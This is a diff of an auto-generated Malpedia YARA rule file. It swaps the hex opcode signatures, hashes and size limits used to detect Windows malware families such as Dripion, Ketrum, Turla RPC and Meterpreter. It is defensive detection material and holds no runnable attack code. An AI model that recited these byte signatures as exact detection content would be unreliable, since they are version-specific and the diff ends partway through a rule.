+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dairy_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "000cf5b63c50e8cdae527d807554d2033db615c3997c132b3125d4523298d8fb"
+		logic_hash = "1c31903f94f05665f06e9add90cd1dfd10d14af78de58f211ffc3b43b0fd9163"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111433,32 +111505,32 @@ rule MALPEDIA_Win_Acehash_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 448b4630 488bd6 482b5738 4883c230 48c1fa02 482bd3 }
-		$sequence_1 = { 488d542420 488d4c2420 4d8bc4 e8???????? 0fb6442421 }
-		$sequence_2 = { 448955a7 438b8ca1a0e90300 43338ca9a0ed0300 43338c81a0ed0300 33ce 43338cb9a0e50300 43338cb1a0f10300 }
-		$sequence_3 = { 418bc1 4533460c c1e808 0fb6d0 418bc2 418bbc9770a10400 c1e810 }
-		$sequence_4 = { 4803d0 8d45fa 4863c8 483bd1 7224 4c8d4c2430 }
-		$sequence_5 = { 25003f0000 418bc8 83e13f 8913 4181e000f00300 c1e104 }
-		$sequence_6 = { 4883ec20 488bd9 e8???????? 488d050b8d0300 488903 488bc3 4883c420 }
-		$sequence_7 = { 0fb6c0 45339c86a0c40300 4503cb 418bc1 48c1e810 0fb6d0 418bc1 }
-		$sequence_8 = { 4c8d2d54051000 413bc0 7554 486303 4869c0b0000000 4e8b542870 4d85d2 }
-		$sequence_9 = { c3 4053 4883ec20 488bd9 488d4c2430 ba02000000 e8???????? }
+		$sequence_0 = { 52 51 ff15???????? 85c0 741a e9???????? }
+		$sequence_1 = { 6a61 b932000000 33c0 8dbc2480030000 6a74 6a61 6a64 }
+		$sequence_2 = { 8b0d???????? 56 ff5110 8b542414 }
+		$sequence_3 = { 53 8b5c2410 55 56 57 8bfb 33f6 }
+		$sequence_4 = { 51 e8???????? 83c418 85c0 0f8e4f010000 8b550c 6800040000 }
+		$sequence_5 = { b900020000 33c0 8dbc2420020000 f3ab }
+		$sequence_6 = { 68???????? 51 e8???????? 83c40c 85c0 0f85bb000000 }
+		$sequence_7 = { 0f8ecefeffff bf???????? 83c9ff 33c0 f2ae f7d1 49 }
+		$sequence_8 = { 55 56 8b742420 8b44241c }
+		$sequence_9 = { 7437 8b442448 6a40 50 ffd6 }
 
 	condition:
-		7 of them and filesize < 2318336
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Minibus_Auto : FILE
+rule MALPEDIA_Win_Dripion_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1ad5e3c7-76e6-5ca8-ae27-272222a9f62c"
+		id = "b0867d7f-74aa-587d-b520-fed580730ed1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.minibus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.minibus_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dripion"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dripion_auto.yar#L1-L112"
 		license_url = "N/A"
-		logic_hash = "f2e35e1c340980cefeddf2362242a94c8425d63f412b36fb6c1988b6b9f9c6f1"
+		logic_hash = "b54fd3ad608c7c63f9361c36ed20fa92f663e8b7a12233b0f074e7ff124b365a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111472,32 +111544,32 @@ rule MALPEDIA_Win_Minibus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c20400 57 c645f800 ff75f8 51 8bce e8???????? }
-		$sequence_1 = { c745b001000000 e8???????? 837f1408 8bc8 894db4 }
-		$sequence_2 = { 837df408 897dec 8d0446 8945fc 7263 8b3b }
-		$sequence_3 = { 7606 ff15???????? 51 52 e8???????? }
-		$sequence_4 = { 83fa03 7c16 0fb74304 83f85c 0f84cd000000 83f82f 0f84c4000000 }
-		$sequence_5 = { 0f86bd000000 ebb1 85c9 7410 51 }
-		$sequence_6 = { b800000080 83c023 50 e8???????? 83c404 85c0 0f84c7000000 }
-		$sequence_7 = { 720f 8d4823 3bc8 7641 }
-		$sequence_8 = { 8d0c4d02000000 8bc2 81f900100000 7216 8b50fc 83c123 2bc2 }
-		$sequence_9 = { 0f87b1000000 c747140f000000 83fb10 7319 6a10 }
+		$sequence_0 = { ffd6 03f8 7402 ffd6 }
+		$sequence_1 = { 03f8 7402 ffd6 ffd6 ffd6 }
+		$sequence_2 = { 03f8 ffd6 8bd8 ffd6 0fafd8 }
+		$sequence_3 = { ffd6 03f8 ffd6 8bd8 ffd6 0fafd8 ffd6 }
+		$sequence_4 = { 740f 3ccf 740b 34cf }
+		$sequence_5 = { ffd6 03f8 ffd6 8bd8 ffd6 0fafd8 }
+		$sequence_6 = { 7513 6a64 ff15???????? 68???????? }
+		$sequence_7 = { 8bf8 ffd6 0faff8 8d3c7f }
+		$sequence_8 = { ffd6 03f8 7402 ffd6 ffd6 }
+		$sequence_9 = { 8bf8 ffd6 0faff8 ffd6 }
 
 	condition:
-		7 of them and filesize < 324608
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Ghostsocks_Auto : FILE
+rule MALPEDIA_Win_Ketrum_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a81e901b-dc82-5aba-9b0a-b793b5feee2d"
+		id = "d00476b6-2e4b-5fca-a576-2efa8a16d1f4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostsocks"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ghostsocks_auto.yar#L1-L148"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrum"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ketrum_auto.yar#L1-L170"
 		license_url = "N/A"
-		logic_hash = "bfb13a4898f7d810671a9ba5dbd8796a5c6a94275321bb29cfaca043cafc81f2"
+		logic_hash = "f6a51a224da39f596220ff41861daa2df80eaaa43f4fe6e9b132d503abfda3ac"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111511,38 +111583,38 @@ rule MALPEDIA_Win_Ghostsocks_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8b4c2408 8d41ff 8b542404 31db }
-		$sequence_1 = { e8???????? 8b4c240c 8401 8b442450 }
-		$sequence_2 = { e8???????? 8b4c2408 8b9424a0050000 8b1a }
-		$sequence_3 = { e8???????? 8b4c2408 8b942490000000 8d5a4c 895c2474 }
-		$sequence_4 = { e8???????? 8b4c240c 890f 8908 }
-		$sequence_5 = { e8???????? 8b4c240c 83f9ff 740d }
-		$sequence_6 = { e8???????? 8b4c240c 81f900ac0000 7416 }
-		$sequence_7 = { e8???????? 8b4c240c 85c9 0f842c010000 }
-		$sequence_8 = { e8???????? 89856068fcff 89956468fcff 8d8d1bc3faff }
-		$sequence_9 = { e8???????? 89856074fbff 89956474fbff a1???????? }
-		$sequence_10 = { e8???????? 8985605ffdff 8995645ffdff 0fb6856fd5faff }
-		$sequence_11 = { e8???????? 89856076fcff 89956476fcff 8b85d0adfdff }
-		$sequence_12 = { e8???????? 89856078fbff 89956478fbff 8b0d???????? }
-		$sequence_13 = { e8???????? 89856071fcff 89956471fcff a1???????? }
-		$sequence_14 = { e8???????? 89856059fcff 89956459fcff 8b851481fbff }
-		$sequence_15 = { e8???????? 89856077feff 89956477feff 8b8d647ffeff }
+		$sequence_0 = { 037de0 8bda 8d8407e6cde121 c1c005 03c6 }
+		$sequence_1 = { 33c0 57 0fb7d0 8bc2 6a20 c1e210 }
+		$sequence_2 = { 53 53 ff15???????? 53 53 6a03 }
+		$sequence_3 = { c1f905 83e01f c1e006 8b0c8da0bc6200 8d440104 8020fe ff36 }
+		$sequence_4 = { 7407 6a01 e8???????? 8d8534fbffff 50 }
+		$sequence_5 = { 53 50 e8???????? 56 8d85fce7ffff }
+		$sequence_6 = { 59 be???????? 8dbd7cffffff f3a5 6a43 8d45b9 53 }
+		$sequence_7 = { 59 85c0 742f b9???????? 8bc1 8d7001 8a10 }
+		$sequence_8 = { e8???????? 83600400 eb23 6a03 8bf7 }
+		$sequence_9 = { 8b44241c 83c40c 837c242408 7302 8bc6 }
+		$sequence_10 = { 6a01 33ff 8db590efffff c645fc00 e8???????? 33f6 39b344010000 }
+		$sequence_11 = { e8???????? 83c410 8d8594e9ffff 50 }
+		$sequence_12 = { 0f87e9030000 ff248519574000 ff35???????? e9???????? }
+		$sequence_13 = { d1f8 8bf8 8bc6 8bd6 }
+		$sequence_14 = { 837db801 7621 6aff 57 8d45a8 8d7dcc }
+		$sequence_15 = { 39b8c0f94100 0f8491000000 ff45e4 83c030 3df0000000 }
 
 	condition:
-		7 of them and filesize < 25016320
+		7 of them and filesize < 4599808
 }
-rule MALPEDIA_Win_Evilpony_Auto : FILE
+rule MALPEDIA_Win_Sys10_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c9372a6e-35c7-52f6-9c3d-299228c095b1"
+		id = "8102506f-afd2-556d-bce7-166bae2224bf"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.evilpony_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sys10_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "ffd9f8ba97fbd907290551898893cb44ef48c12bf2cd21edd5aa01ba36ae5a3e"
+		logic_hash = "55e8ffe5ea66b378dbdb046d53bca4c06889e1977a823bfc6a76defa2eb61357"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111556,32 +111628,32 @@ rule MALPEDIA_Win_Evilpony_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a04 8d9ddcf7ffff c785dcf7ffff1000efbe e8???????? ffb5f0f7ffff 8bc7 }
-		$sequence_1 = { 85ff 7423 8bc6 e8???????? 56 }
-		$sequence_2 = { 8d8c019979825a c14db002 8bc2 3345e4 894da8 3345cc 3345c4 }
-		$sequence_3 = { 55 8bec 56 6885010000 6a40 ff15???????? 8bf0 }
-		$sequence_4 = { e8???????? 83c414 6a00 6a00 57 56 }
-		$sequence_5 = { ff15???????? 85c0 0f85b0000000 56 57 8b3d???????? 33f6 }
-		$sequence_6 = { 83c410 85ff 7420 688c000000 6a40 ff15???????? }
-		$sequence_7 = { 53 89442438 ff5114 3bf7 7510 }
-		$sequence_8 = { e8???????? 83c40c ff750c 6a1c ff7508 e8???????? 83c40c }
-		$sequence_9 = { 8b55b0 3345d8 2355ac 3345c4 894da8 d1c0 8945e4 }
+		$sequence_0 = { 8d4c2413 51 6800400000 52 }
+		$sequence_1 = { 8b542408 6a03 50 8b44240c 51 }
+		$sequence_2 = { 53 ff15???????? 8b06 50 e8???????? 8b442418 }
+		$sequence_3 = { 8b442410 8b4c240c 8b542408 6a03 50 }
+		$sequence_4 = { 7407 53 ff15???????? 8b06 50 }
+		$sequence_5 = { 6a03 68???????? 68???????? 51 52 }
+		$sequence_6 = { 52 ffd7 8b4308 50 }
+		$sequence_7 = { 6800400000 52 50 e8???????? 8bf8 83c410 }
+		$sequence_8 = { ff15???????? 8bf8 ffd6 85ff 8b3d???????? }
+		$sequence_9 = { 6810270000 ff15???????? 33c0 59 c20c00 8b442410 c70044020000 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Shimrat_Auto : FILE
+rule MALPEDIA_Win_Oatboat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "55457a06-1988-5269-89a3-7d42c80efbb3"
+		id = "c48265c6-7a9b-56ea-94f6-25b8465cba6b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shimrat_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oatboat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.oatboat_auto.yar#L1-L109"
 		license_url = "N/A"
-		logic_hash = "9a44a689bc8afe661c9129a62baf593cebe3f41d9c0399451d80b6ae3b28e636"
+		logic_hash = "56315385a1ed981e34ba70026cf854697ce902e66d4a4a661e8df69530ad3228"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111595,34 +111667,32 @@ rule MALPEDIA_Win_Shimrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 8bce e8???????? 85c0 742b 837dfc04 7518 }
-		$sequence_1 = { 85c0 7409 ff7570 e8???????? }
-		$sequence_2 = { 5e c3 33c0 8901 894104 894108 c3 }
-		$sequence_3 = { 0f8416010000 8d8e90000000 e8???????? 50 8d8e90000000 }
-		$sequence_4 = { 85c0 75ca 8b07 881c06 8b4514 }
-		$sequence_5 = { 50 e8???????? 83c414 50 8d4f6c e8???????? }
-		$sequence_6 = { 8b35???????? 83c40c 395dd8 7405 ff75d8 }
-		$sequence_7 = { 0f84a4000000 6a7f 8d45d8 50 ff7560 }
-		$sequence_8 = { e8???????? 85c0 0f8488000000 8d4d34 }
-		$sequence_9 = { ff7560 ffd6 e9???????? 53 ebd0 8d4d28 e8???????? }
+		$sequence_0 = { c745e04e744672 c745e465655669 c745e872747561 c745ec6c4d656d c745f06f727900 e8???????? }
+		$sequence_1 = { 488bf9 c745e04b004500 33db c745e452004e00 488d4de0 66895df8 c745e845004c00 }
+		$sequence_2 = { c745e46f70794d c745e8656d6f72 66c745ec7900 e8???????? 4d8bc4 }
+		$sequence_3 = { e8???????? 488bcf ffd0 488b5c2450 488b742458 488b7c2460 4883c430 }
+		$sequence_4 = { c740e86c000000 e8???????? 4885c0 740e 488bd7 488bc8 e8???????? }
+		$sequence_5 = { 4883653000 488d4de0 4c896538 c745e04e74416c c745e46c6f6361 c745e874655669 c745ec72747561 }
+		$sequence_6 = { c745f46f727900 e8???????? 4c8d4d38 c744242840000000 4533c0 }
+		$sequence_7 = { 0f84a3000000 4d8b5210 4d85d2 0f8496000000 4d397a30 0f848c000000 498b5a60 }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 58368
 }
-rule MALPEDIA_Win_Isspace_Auto : FILE
+rule MALPEDIA_Win_Redalpha_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b06e0b56-5b2e-5927-89d7-5a1fa4e89bfc"
+		id = "6a45e264-f0cb-55d8-8d41-9c16d8d716f7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.isspace_auto.yar#L1-L99"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.redalpha_auto.yar#L1-L230"
 		license_url = "N/A"
-		logic_hash = "f9cfbe43c7bd218df762aeca13b65476ac7bccb2b29d82571f83ea3511bd9d7b"
+		logic_hash = "cbf7a84b857c49ee3d81dd7f006e794089e9ad6271126e24c962dedf553b5fc2"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -111634,30 +111704,46 @@ rule MALPEDIA_Win_Isspace_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a3???????? e8???????? 6800200300 a3???????? e8???????? }
-		$sequence_1 = { 50 81eca8000000 a1???????? 3145f8 33c5 8945e4 }
-		$sequence_2 = { 68???????? eb04 83c007 50 }
-		$sequence_3 = { 83c40c 5f c7400400000000 c70012140000 }
-		$sequence_4 = { 6870170000 ff15???????? e9???????? 6a40 6a00 68???????? e8???????? }
-		$sequence_5 = { b898a30000 e8???????? a1???????? 3145f8 }
-		$sequence_6 = { 83c404 6683f809 740c 6683f806 }
-		$sequence_7 = { 50 8d45f0 64a300000000 8965e8 c745fc00000000 ff15???????? 3d04080000 }
+		$sequence_0 = { 8bc1 b900000000 2bde 7414 8b55fc 03d6 }
+		$sequence_1 = { 2bc2 83fa38 ba???????? 0f42c1 }
+		$sequence_2 = { 33c0 eb04 33f6 8bc1 }
+		$sequence_3 = { 8bc8 c1e903 83e13f 894df4 8d14d8 }
+		$sequence_4 = { 7256 33c9 85f6 7417 8b55f4 }
+		$sequence_5 = { 3bce 72f4 8b5d08 8d5718 }
+		$sequence_6 = { 8b5dfc 03d7 8a0419 88440a18 41 3bce 72f4 }
+		$sequence_7 = { ff4714 8bc3 be40000000 c1e81d 2bf1 }
+		$sequence_8 = { 413bfb 72d8 448b4d88 488b7d68 }
+		$sequence_9 = { 7d09 0fb685443b0100 ebe1 80bd443b010000 }
+		$sequence_10 = { ff15???????? 488bc8 488d542460 ff15???????? 488bf8 }
+		$sequence_11 = { c744247818000000 4c896580 c7458801000000 4533c9 4c8d442478 488d5738 488d4f20 }
+		$sequence_12 = { 458bc6 498bcd e8???????? 488b9c2498040000 4881c440040000 }
+		$sequence_13 = { 4185d3 740c 0f1f440000 d1ea }
+		$sequence_14 = { 488b4c2440 ff15???????? 90 488d8c2460010000 e8???????? 8bc3 }
+		$sequence_15 = { 0f849d000000 488b7928 4885ff 0f8490000000 4883793000 0f8485000000 }
+		$sequence_16 = { 740b 83feff 0f8483000000 eb7d 8b1c9dc4f24000 6800080000 6a00 }
+		$sequence_17 = { 837de404 7412 8d45e0 50 56 ff15???????? }
+		$sequence_18 = { 897c2428 e8???????? 83c410 8d442424 }
+		$sequence_19 = { 7420 6bc618 57 8db8f06f4100 57 }
+		$sequence_20 = { 8b04bd30744100 f644032801 7444 837c0318ff 743d }
+		$sequence_21 = { 8d45f4 64a300000000 683f000f00 6a00 6a00 }
+		$sequence_22 = { 7313 8a8750604100 08441619 42 0fb64101 3bd0 }
+		$sequence_23 = { ff75f8 ff15???????? 837de404 7412 8d45e0 }
 
 	condition:
-		7 of them and filesize < 434176
+		7 of them and filesize < 606208
 }
-rule MALPEDIA_Win_Hesperbot_Auto : FILE
+rule MALPEDIA_Win_Turla_Rpc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bb461f42-9b9a-5e68-bbce-8f8a48953354"
+		id = "66c1d7fa-741a-51ae-994f-511185fa9310"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hesperbot_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_rpc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.turla_rpc_auto.yar#L1-L168"
 		license_url = "N/A"
-		logic_hash = "5b0325f4989a837a39c4052bc59652c8fb0f8c04335eefffdde925a80c93ba45"
+		logic_hash = "47df29c03096bb465616e91b5c4f41a104d4cb12e1b0226d75d72ad4e8590fd9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111671,32 +111757,38 @@ rule MALPEDIA_Win_Hesperbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33742438 33c7 23742430 8b7c2444 337c243c 33742440 237c2434 }
-		$sequence_1 = { 5e c9 c3 8b4a3c 33c0 8d8c1188000000 394104 }
-		$sequence_2 = { ff7608 6a00 e8???????? 83c410 8b36 3bf7 75e1 }
-		$sequence_3 = { 8d7306 8d7b04 8903 e8???????? 85c0 7506 668907 }
-		$sequence_4 = { e8???????? 53 8945fc e8???????? 83c414 5b 8b45fc }
-		$sequence_5 = { 56 8bb42404030000 8d442414 33c9 57 2bf0 8d440c18 }
-		$sequence_6 = { 56 ff7514 33c0 50 6a01 8d4d10 51 }
-		$sequence_7 = { 8d45f8 99 52 50 8b4510 99 52 }
-		$sequence_8 = { 8974242c 8b742448 8bde 8bef 0fa4dd17 8bc7 c1e317 }
-		$sequence_9 = { 8902 894104 5f 33c0 40 5e c3 }
+		$sequence_0 = { c745b06970746f c745b472536163 66c745b86c00 ff15???????? }
+		$sequence_1 = { 66c7852c0100002626 c6852e01000055 c745b0193a3431 c745b4193c3727 c745b834272c14 c645bc55 c7854001000030163930 }
+		$sequence_2 = { c645bc55 c7854001000030163930 c78544010000343b2025 c6854801000055 }
+		$sequence_3 = { 66c785ec0000000255 c785a0000000193a3431 c785a4000000193c3727 c785a800000034272c02 }
+		$sequence_4 = { 66c7850c0100003a3b c6850e01000055 c745c007303431 c745c4133c3930 c645c855 c744244806393030 }
+		$sequence_5 = { c3 488d053bda0000 488d542458 488d4c2420 }
+		$sequence_6 = { c785f800000021133c39 66c785fc0000003002 c685fe00000055 c785d000000012302113 }
+		$sequence_7 = { c78544010000343b2025 c6854801000055 c78560010000013c3830 c785640100003a202155 }
+		$sequence_8 = { c644247e55 c745883336393a 66c7458c2630 c6458e55 c744245033273034 66c74424543155 c744243033273030 }
+		$sequence_9 = { 6a01 8d45bc 50 ff9540ffffff 8d8550ffffff 50 8d8548ffffff }
+		$sequence_10 = { 8d8588feffff 50 57 ff9570fdffff 8b8d6cfdffff 89413c }
+		$sequence_11 = { 5d c20400 8b1d???????? 8d4900 8d44243c 50 ff15???????? }
+		$sequence_12 = { 8b7dbc 57 ff15???????? 83c404 }
+		$sequence_13 = { 50 50 688f000000 ff15???????? 56 }
+		$sequence_14 = { 66c785bcfeffff6b00 c785c8feffff6674656c 66c785ccfeffff6c00 c785a8feffff66777269 66c785acfeffff7465 c685aefeffff00 c785a0feffff6d616c6c }
+		$sequence_15 = { 6a00 8d45f8 50 ff750c ff37 56 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 311296
 }
-rule MALPEDIA_Win_Mebromi_Auto : FILE
+rule MALPEDIA_Win_Goggles_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3d64e85a-906f-5ddb-9f75-04eb426f7ebc"
+		id = "5a06c6e9-c0df-5eb2-9be8-0912ecacc960"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mebromi_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.goggles_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "051f5b8119e90ef14be758def00ef62b697ce727969ed9523ac57414d0773faf"
+		logic_hash = "6adf86a94e27e4da9bbef6eb899bde95be7c68b8b1a213561e769f61dd93d169"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111710,34 +111802,34 @@ rule MALPEDIA_Win_Mebromi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5f eb26 8d4508 8db694702900 6a00 }
-		$sequence_1 = { b82c2900d8 2c29 0000 2d29008a46 0323 }
-		$sequence_2 = { 8bec 8b4508 ff348520712900 ff15???????? }
-		$sequence_3 = { eb0f 0fb6d2 f68201a0290004 7403 }
-		$sequence_4 = { 56 ffd7 3bdd 5b }
-		$sequence_5 = { 68000000c0 68???????? ff15???????? 8b3d???????? 83f8ff a3???????? 7544 }
-		$sequence_6 = { 58 c20c00 ff05???????? 833d????????01 55 56 57 }
-		$sequence_7 = { 68???????? ff742410 ff15???????? 8bf0 85f6 7416 57 }
-		$sequence_8 = { 8888009f2900 eb1f 83f861 7213 83f87a }
-		$sequence_9 = { ff742410 ff15???????? 8bf0 85f6 7416 57 56 }
+		$sequence_0 = { c1fa02 83e23f 8a8a10400010 880c33 }
+		$sequence_1 = { 51 e8???????? 8b1d???????? b941000000 33c0 }
+		$sequence_2 = { 8d54247c 51 52 8d842488010000 68???????? 50 }
+		$sequence_3 = { 6a01 51 ff15???????? 8b742430 8b542431 }
+		$sequence_4 = { 53 ff15???????? 83c414 33c0 85ed }
+		$sequence_5 = { 51 ff15???????? 83c9ff bf???????? 33c0 83c414 }
+		$sequence_6 = { c744241002000000 8d8c2480020000 51 ff15???????? 8b442410 5f 5e }
+		$sequence_7 = { ffd5 8bf0 8bc7 99 f77c242c 81ee???????? 0fbe8288410010 }
+		$sequence_8 = { 2bd6 56 57 03ea ffd3 57 }
+		$sequence_9 = { a0???????? 55 57 88442410 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Vawtrak_Auto : FILE
+rule MALPEDIA_Win_Meterpreter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2112bb64-22b3-5c03-b2f8-c6e0d0b0c10f"
+		id = "33d2907b-ab63-5a72-98c0-3e3546cda7ba"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vawtrak_auto.yar#L1-L216"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.meterpreter_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "60253f607ddfb6f5514a6ed220e9ab8f7a24d3f7658f13c97c0cead0093a08d3"
+		logic_hash = "1631dc247baef420a5deaf156c823d0d4f3e3c68f2c5cd0e3fcbf8155c8e3d6f"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -111749,45 +111841,32 @@ rule MALPEDIA_Win_Vawtrak_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a01 ff35???????? 6a04 6a01 }
-		$sequence_1 = { 6a04 6a01 50 ff15???????? 85c0 }
-		$sequence_2 = { 6a00 6a00 e8???????? 50 ff15???????? }
-		$sequence_3 = { 33c0 b900000080 40 8901 81e900100000 75f6 }
-		$sequence_4 = { c3 56 be???????? 33c0 40 8706 }
-		$sequence_5 = { ba00ff0000 8bc1 23c2 3bc2 }
-		$sequence_6 = { eb09 a804 7405 e8???????? 803d????????00 7405 }
-		$sequence_7 = { 85c0 7516 c705????????02000000 c705????????01000000 }
-		$sequence_8 = { 6a08 68???????? 56 ffd7 85c0 }
-		$sequence_9 = { 7528 68???????? ff15???????? 85c0 7504 }
-		$sequence_10 = { 50 ff15???????? a3???????? 85c0 74e7 }
-		$sequence_11 = { e8???????? 33d2 b9ff3f0000 f7f1 }
-		$sequence_12 = { 59 57 8bf0 ff15???????? 8bc6 }
-		$sequence_13 = { 8bc6 8703 3bc6 74f8 }
-		$sequence_14 = { 56 6a04 53 57 }
-		$sequence_15 = { 8d429f 3c0f 7705 80ea61 eb0a 8d42bf 3c0f }
-		$sequence_16 = { e9???????? 8ac1 c1e904 c0e004 }
-		$sequence_17 = { 8ac8 240f 80e1f0 80c110 32c8 }
-		$sequence_18 = { 3c41 7c11 3c46 7f0d }
-		$sequence_19 = { 42881408 85f6 75de 894b0c eb03 01730c }
-		$sequence_20 = { 3b4308 0f84e4000000 40883c08 ff430c e9???????? 0f86bf000000 81c7fffeffff }
-		$sequence_21 = { 48397c2430 7505 bb01000000 8bc3 }
-		$sequence_22 = { 3b4308 7748 85f6 742a }
+		$sequence_0 = { 99 f7fb 043b 8801 }
+		$sequence_1 = { 0580fc5600 2ab3780b0019 43 51 360000 }
+		$sequence_2 = { 53 8b22 0c56 8b7508 57 8b7d10 }
+		$sequence_3 = { b80100f200 5d bc90909090 90 90 90 55 }
+		$sequence_4 = { b80cfdc100 15c3b8d0fc 40 005dc3 058e3053ff 7ef8 }
+		$sequence_5 = { 8be5 5d c27f00 8d4df4 8d55ec }
+		$sequence_6 = { 90 90 90 90 83775840 41 00ff }
